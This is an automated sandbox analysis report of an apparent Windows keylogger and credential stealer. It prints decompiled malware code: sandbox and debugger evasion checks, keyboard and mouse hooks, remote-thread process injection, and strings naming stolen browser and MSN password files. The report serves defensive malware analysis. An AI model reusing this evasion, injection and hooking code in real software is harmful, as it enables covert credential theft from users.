                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B118, Relevance: 72.0, APIs: 29, Strings: 12, Instructions: 207COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				char* _t1;
				char* _t2;
				char* _t3;
				char* _t4;
				char* _t5;
				char* _t6;
				char* _t7;
				char* _t8;
				char* _t9;
				char* _t10;
				char* _t11;
				char* _t12;
				char* _t13;
				long _t15;
				void* _t49;
				long _t58;
				void* _t62;
				void* _t63;
				intOrPtr* _t64;

				_t63 = __esi;
				_t62 = __edi;
				_t1 =  *0x40d1d4; // 0x40e8e0
				if( *_t1 == 1 && E004052EC() == 1) {
					ExitProcess(0);
				}
				_t2 =  *0x40d1b0; // 0x40e8e1
				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
					ExitProcess(0);
				}
				_t3 =  *0x40d1fc; // 0x40e8e2
				if( *_t3 == 1 && E00405124() == 1) {
					ExitProcess(0);
				}
				_t4 =  *0x40d1ac; // 0x40e8e3
				_t71 =  *_t4 - 1;
				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
					ExitProcess(0);
				}
				_t5 =  *0x40d1f4; // 0x40e8e4
				if( *_t5 == 1 && E00405310() == 1) {
					ExitProcess(0);
				}
				_t6 =  *0x40d1c8; // 0x40e8e5
				if( *_t6 == 1 && E004054A4() == 1) {
					ExitProcess(0);
				}
				_t7 =  *0x40d1d0; // 0x40e8e6
				if( *_t7 == 1 && E004053EC() == 1) {
					ExitProcess(0);
				}
				_t8 =  *0x40d1c0; // 0x40e8e7
				if( *_t8 == 1 && E00405334() == 1) {
					ExitProcess(0);
				}
				_t9 =  *0x40d1f8; // 0x40e8e8
				_t81 =  *_t9 - 1;
				if( *_t9 == 1) {
					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
					if(_t49 == 1) {
						ExitProcess(0);
					}
				}
				_t10 =  *0x40d1bc; // 0x40e8e9
				if( *_t10 == 1 && E0040588C() == 1) {
					ExitProcess(0);
				}
				_t11 =  *0x40d1b4; // 0x40e8ea
				if( *_t11 == 1 && E004056C0() == 1) {
					ExitProcess(0);
				}
				_t12 =  *0x40d200; // 0x40e8eb
				if( *_t12 == 1) {
					_t58 = GetTickCount();
					if(E00405750(L00405168) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004051CC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004052EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405310) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405334) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004053EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004054A4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040555C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056DC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405770) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004057B4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040588C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056C0) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405124) != 0) {
						ExitProcess(0);
					}
					if(E004056DC(_t58) == 1) {
						ExitProcess(0);
					}
				}
				_t13 =  *0x40d200; // 0x40e8eb
				if( *_t13 != 1) {
					L70:
					return _t13;
				} else {
					E00405770();
					_t15 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t64 =  *_t64 - _t58;
					asm("sbb [esp+0x4], edx");
					_t13 = _t15;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t13;
					}
					if(_t13 <= 0x1388) {
						goto L70;
					}
					goto L69;
				}
			}























                                    0x0040b118
                                    0x0040b118
                                    0x0040b119
                                    0x0040b121
                                    0x0040b12e
                                    0x0040b12e
                                    0x0040b133
                                    0x0040b13b
                                    0x0040b148
                                    0x0040b148
                                    0x0040b14d
                                    0x0040b155
                                    0x0040b162
                                    0x0040b162
                                    0x0040b167
                                    0x0040b16c
                                    0x0040b16f
                                    0x0040b17c
                                    0x0040b17c
                                    0x0040b181
                                    0x0040b189
                                    0x0040b196
                                    0x0040b196
                                    0x0040b19b
                                    0x0040b1a3
                                    0x0040b1b0
                                    0x0040b1b0
                                    0x0040b1b5
                                    0x0040b1bd
                                    0x0040b1ca
                                    0x0040b1ca
                                    0x0040b1cf
                                    0x0040b1d7
                                    0x0040b1e4
                                    0x0040b1e4
                                    0x0040b1e9
                                    0x0040b1ee
                                    0x0040b1f1
                                    0x0040b1f3
                                    0x0040b1fa
                                    0x0040b1fe
                                    0x0040b1fe
                                    0x0040b1fa
                                    0x0040b203
                                    0x0040b20b
                                    0x0040b218
                                    0x0040b218
                                    0x0040b21d
                                    0x0040b225
                                    0x0040b232
                                    0x0040b232
                                    0x0040b237
                                    0x0040b23f
                                    0x0040b24a
                                    0x0040b258
                                    0x0040b25c
                                    0x0040b25c
                                    0x0040b26d
                                    0x0040b271
                                    0x0040b271
                                    0x0040b282
                                    0x0040b286
                                    0x0040b286
                                    0x0040b297
                                    0x0040b29b
                                    0x0040b29b
                                    0x0040b2ac
                                    0x0040b2b0
                                    0x0040b2b0
                                    0x0040b2c1
                                    0x0040b2c5
                                    0x0040b2c5
                                    0x0040b2d6
                                    0x0040b2da
                                    0x0040b2da
                                    0x0040b2eb
                                    0x0040b2ef
                                    0x0040b2ef
                                    0x0040b300
                                    0x0040b304
                                    0x0040b304
                                    0x0040b315
                                    0x0040b319
                                    0x0040b319
                                    0x0040b32a
                                    0x0040b32e
                                    0x0040b32e
                                    0x0040b33f
                                    0x0040b343
                                    0x0040b343
                                    0x0040b354
                                    0x0040b358
                                    0x0040b358
                                    0x0040b369
                                    0x0040b36d
                                    0x0040b36d
                                    0x0040b379
                                    0x0040b37d
                                    0x0040b37d
                                    0x0040b379
                                    0x0040b382
                                    0x0040b38a
                                    0x0040b3be
                                    0x0040b3be
                                    0x0040b38c
                                    0x0040b38c
                                    0x0040b391
                                    0x0040b398
                                    0x0040b39c
                                    0x0040b39d
                                    0x0040b3a0
                                    0x0040b3a4
                                    0x0040b3a9
                                    0x0040b3b4
                                    0x00000000
                                    0x00000000
                                    0x0040b3b6
                                    0x0040b3b8
                                    0x00000000
                                    0x0040b3b8
                                    0x0040b3b0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040b3b2

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403A58, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				long _t17;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t31;
				long _t32;
				void* _t33;
				DWORD* _t34;

				_t25 = __ecx;
				_t34 =  &_v24;
				_t33 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t32 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
				_v20 = _t15;
				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
				_v24 = _t17;
				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
				_t24 = _t19;
				if(_t24 != 0) {
					WaitForSingleObject(_t24, 0xffffffff);
					GetExitCodeThread(_t24, _t34);
					_t32 =  *_t34;
				}
				return _t32;
			}





















                                    0x00403a58
                                    0x00403a5c
                                    0x00403a5f
                                    0x00403a61
                                    0x00403a63
                                    0x00403a65
                                    0x00403a7c
                                    0x00403a95
                                    0x00403aae
                                    0x00403ab6
                                    0x00403abb
                                    0x00403ac3
                                    0x00403ac8
                                    0x00403adb
                                    0x00403ae0
                                    0x00403ae4
                                    0x00403ae9
                                    0x00403af0
                                    0x00403af5
                                    0x00403af5
                                    0x00403b01

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004012B8, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				CHAR* _t8;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t8 = CharNextA(_t22); // executed
							_t22 = _t8;
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00402074(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}




















                                    0x004012bc
                                    0x004012be
                                    0x004012ca
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012d4
                                    0x004012d7
                                    0x004012e4
                                    0x004012e6
                                    0x0040132d
                                    0x0040132d
                                    0x00401331
                                    0x00000000
                                    0x00000000
                                    0x004012ec
                                    0x00401320
                                    0x00401329
                                    0x0040132b
                                    0x00000000
                                    0x0040132b
                                    0x004012ef
                                    0x004012f4
                                    0x00401306
                                    0x00401306
                                    0x0040130a
                                    0x00000000
                                    0x00000000
                                    0x004012f9
                                    0x00401302
                                    0x00401304
                                    0x00401304
                                    0x00401313
                                    0x0040131b
                                    0x0040131b
                                    0x00401313
                                    0x00401337
                                    0x0040133c
                                    0x0040133e
                                    0x00401340
                                    0x00401395
                                    0x00401395
                                    0x00401399
                                    0x00000000
                                    0x00000000
                                    0x00401346
                                    0x00401381
                                    0x00401388
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040138a
                                    0x0040138a
                                    0x0040138c
                                    0x0040138f
                                    0x00401390
                                    0x00401391
                                    0x00000000
                                    0x0040138a
                                    0x0040134e
                                    0x00401367
                                    0x00401367
                                    0x0040136b
                                    0x00000000
                                    0x00000000
                                    0x00401353
                                    0x0040135a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040135c
                                    0x0040135c
                                    0x0040135e
                                    0x00401361
                                    0x00401362
                                    0x00401363
                                    0x0040135c
                                    0x00401374
                                    0x0040137c
                                    0x0040137c
                                    0x00401374
                                    0x004013a1
                                    0x004012df
                                    0x004012df
                                    0x00000000
                                    0x004012df
                                    0x004012d7

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
